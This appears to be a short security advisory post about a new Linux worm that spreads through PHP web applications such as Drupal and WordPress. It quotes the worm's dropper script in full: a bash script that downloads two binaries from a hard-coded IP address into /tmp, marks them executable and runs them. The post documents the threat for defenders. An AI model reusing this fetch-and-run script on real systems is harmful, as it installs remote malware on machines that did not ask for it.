More info on the new Linux worm

the first part of worm is yet another php worm (with drupal, wordpress, etc. attacked).
more information on older versions here:
http://isc.sans.org/diary.php?storyid=823

there is another shell script called gicumz there:

#!/bin/bash
cd /tmp
wget 209.123.16.34/session
chmod +x session
./session
cd /tmp
wget 209.123.16.34/derfiq
chmod +x derfiq
./derfiq

the worm itself that runs on the linux system though, is something new as far as we can tell.

gadi evron,
ge@beyondsecurity.com.

Share